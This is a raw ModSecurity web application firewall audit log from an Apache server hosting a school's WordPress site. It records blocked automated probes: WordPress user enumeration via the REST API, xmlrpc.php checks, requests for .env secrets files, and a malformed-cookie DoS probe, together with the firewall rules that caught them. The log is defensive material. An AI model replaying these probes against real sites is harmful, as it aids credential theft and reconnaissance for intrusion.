ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746849234692774 6046 (- - -) Stopwatch2: 1746849234692774 6046; combined=4418, p1=618, p2=3560, p3=31, p4=34, p5=102, sr=129, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --555aa615-Z-- --1c782e39-A-- [10/May/2025:10:54:49 +0700] aB7OCRLuBiaF9R054QBb6AAAAAk 103.236.140.4 55014 103.236.140.4 8181 --1c782e39-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1c782e39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c782e39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746849289170493 3329 (- - -) Stopwatch2: 1746849289170493 3329; combined=1422, p1=471, p2=910, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c782e39-Z-- --031d2b7f-A-- [10/May/2025:10:54:54 +0700] aB7ODhLuBiaF9R054QBb6gAAAAo 103.236.140.4 55018 103.236.140.4 8181 --031d2b7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.6 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --031d2b7f-C-- demo.sayHello --031d2b7f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --031d2b7f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746849294812163 5699 (- - -) Stopwatch2: 1746849294812163 5699; combined=4217, p1=549, p2=3445, p3=33, p4=35, p5=93, sr=80, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --031d2b7f-Z-- --07191f7c-A-- [10/May/2025:10:55:44 +0700] aB7OQBLuBiaF9R054QBb7AAAABA 103.236.140.4 55022 103.236.140.4 8181 --07191f7c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --07191f7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07191f7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746849344107621 3313 (- - -) Stopwatch2: 1746849344107621 3313; combined=1421, p1=474, p2=906, p3=0, p4=0, p5=40, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07191f7c-Z-- --35e2d83f-A-- [10/May/2025:10:55:50 +0700] aB7ORsi6w7GTj2w44Z6cdQAAAMw 103.236.140.4 55026 103.236.140.4 8181 --35e2d83f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.116 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --35e2d83f-C-- demo.sayHello --35e2d83f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --35e2d83f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746849350322325 5119 (- - -) Stopwatch2: 1746849350322325 5119; combined=3815, p1=451, p2=3144, p3=25, p4=25, p5=98, sr=68, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35e2d83f-Z-- --92b4524d-A-- [10/May/2025:11:03:54 +0700] aB7QKquC4AqLGUOyzyX8JAAAAIY 103.236.140.4 55078 103.236.140.4 8181 --92b4524d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 170.64.164.200 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 170.64.164.200 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --92b4524d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92b4524d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746849834875385 920 (- - -) Stopwatch2: 1746849834875385 920; combined=388, p1=347, p2=0, p3=0, p4=0, p5=41, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92b4524d-Z-- --027b7849-A-- [10/May/2025:11:31:35 +0700] aB7Wp9r9PbfRBMhzxmRbOQAAAE0 103.236.140.4 55202 103.236.140.4 8181 --027b7849-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 111.90.188.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 111.90.188.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --027b7849-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --027b7849-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746851495314464 2298 (- - -) Stopwatch2: 1746851495314464 2298; combined=1228, p1=398, p2=799, p3=0, p4=0, p5=30, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --027b7849-Z-- --1f38373d-A-- [10/May/2025:11:35:47 +0700] aB7XoxLuBiaF9R054QBcBwAAAAs 103.236.140.4 55252 103.236.140.4 8181 --1f38373d-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 164.90.228.79 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 164.90.228.79 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --1f38373d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f38373d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746851747350161 746 (- - -) Stopwatch2: 1746851747350161 746; combined=344, p1=309, p2=0, p3=0, p4=0, p5=35, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f38373d-Z-- --3f032745-A-- [10/May/2025:12:20:27 +0700] aB7iG9r9PbfRBMhzxmRc9AAAAEM 103.236.140.4 59200 103.236.140.4 8181 --3f032745-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 171.6.105.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 171.6.105.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3f032745-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f032745-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746854427642497 2887 (- - -) Stopwatch2: 1746854427642497 2887; combined=1253, p1=438, p2=785, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f032745-Z-- --cb755a57-A-- [10/May/2025:12:21:12 +0700] aB7iSMi6w7GTj2w44Z6efAAAAMI 103.236.140.4 59208 103.236.140.4 8181 --cb755a57-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.157.243.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.157.243.79 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cb755a57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb755a57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746854472183693 3107 (- - -) Stopwatch2: 1746854472183693 3107; combined=1297, p1=431, p2=836, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb755a57-Z-- --449d2e4b-A-- [10/May/2025:12:29:33 +0700] aB7kPRLuBiaF9R054QBeqAAAAA4 103.236.140.4 59294 103.236.140.4 8181 --449d2e4b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 80.66.75.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 80.66.75.151 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 --449d2e4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --449d2e4b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746854973767210 864 (- - -) Stopwatch2: 1746854973767210 864; combined=347, p1=302, p2=0, p3=0, p4=0, p5=45, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --449d2e4b-Z-- --36848245-A-- [10/May/2025:12:38:52 +0700] aB7mbBLuBiaF9R054QBf1gAAAA4 103.236.140.4 34670 103.236.140.4 8181 --36848245-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --36848245-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36848245-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746855532314758 2854 (- - -) Stopwatch2: 1746855532314758 2854; combined=1243, p1=446, p2=767, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36848245-Z-- --b8c11968-A-- [10/May/2025:12:39:00 +0700] aB7mdBLuBiaF9R054QBf2AAAABc 103.236.140.4 34674 103.236.140.4 8181 --b8c11968-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.201 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b8c11968-C-- demo.sayHello --b8c11968-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8c11968-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746855540111251 5725 (- - -) Stopwatch2: 1746855540111251 5725; combined=4228, p1=531, p2=3478, p3=31, p4=33, p5=92, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8c11968-Z-- --6acd6d40-A-- [10/May/2025:12:59:06 +0700] aB7rKhLuBiaF9R054QBf6gAAABQ 103.236.140.4 34786 103.236.140.4 8181 --6acd6d40-B-- GET / HTTP/1.0 Host: smkn22-jkt.sch.id Cookie: =; ueid= X-Real-IP: 194.121.51.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 194.121.51.172 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 Cache-Control: max-age=259200 --6acd6d40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6acd6d40-H-- Message: Access denied with code 403 (phase 1). Pattern match "(^|;)=(;|$)" at REQUEST_HEADERS:Cookie. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "74"] [id "220020"] [rev "2"] [msg "COMODO WAF: DoS vulnerability in Apache 2.2.17 - 2.2.21 (CVE-2012-0021)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746856746002079 863 (- - -) Stopwatch2: 1746856746002079 863; combined=340, p1=299, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6acd6d40-Z-- --9287134b-A-- [10/May/2025:13:01:45 +0700] aB7ryci6w7GTj2w44Z6gRgAAAME 103.236.140.4 34792 103.236.140.4 8181 --9287134b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9287134b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9287134b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746856905654011 3070 (- - -) Stopwatch2: 1746856905654011 3070; combined=1314, p1=452, p2=827, p3=0, p4=0, p5=35, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9287134b-Z-- --06abd420-A-- [10/May/2025:13:01:49 +0700] aB7rzauC4AqLGUOyzyX_TwAAAI0 103.236.140.4 34796 103.236.140.4 8181 --06abd420-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.152 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --06abd420-C-- demo.sayHello --06abd420-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --06abd420-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746856909107452 5561 (- - -) Stopwatch2: 1746856909107452 5561; combined=4182, p1=529, p2=3429, p3=33, p4=33, p5=93, sr=72, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06abd420-Z-- --40fa6b40-A-- [10/May/2025:13:12:41 +0700] aB7uWRLuBiaF9R054QBf8AAAABA 103.236.140.4 34860 103.236.140.4 8181 --40fa6b40-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.231 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.231 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --40fa6b40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40fa6b40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746857561888898 3225 (- - -) Stopwatch2: 1746857561888898 3225; combined=1428, p1=504, p2=893, p3=0, p4=0, p5=31, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40fa6b40-Z-- --4f64632b-A-- [10/May/2025:13:12:46 +0700] aB7uXhLuBiaF9R054QBf8QAAABE 103.236.140.4 34864 103.236.140.4 8181 --4f64632b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.231 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.231 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4f64632b-C-- demo.sayHello --4f64632b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f64632b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746857566945115 5007 (- - -) Stopwatch2: 1746857566945115 5007; combined=3879, p1=469, p2=3198, p3=21, p4=24, p5=97, sr=67, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
